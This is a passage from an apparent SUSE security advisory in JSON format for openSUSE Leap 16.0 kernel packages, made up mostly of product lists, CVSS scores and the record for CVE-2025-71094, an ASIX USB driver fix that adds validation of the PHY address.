"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
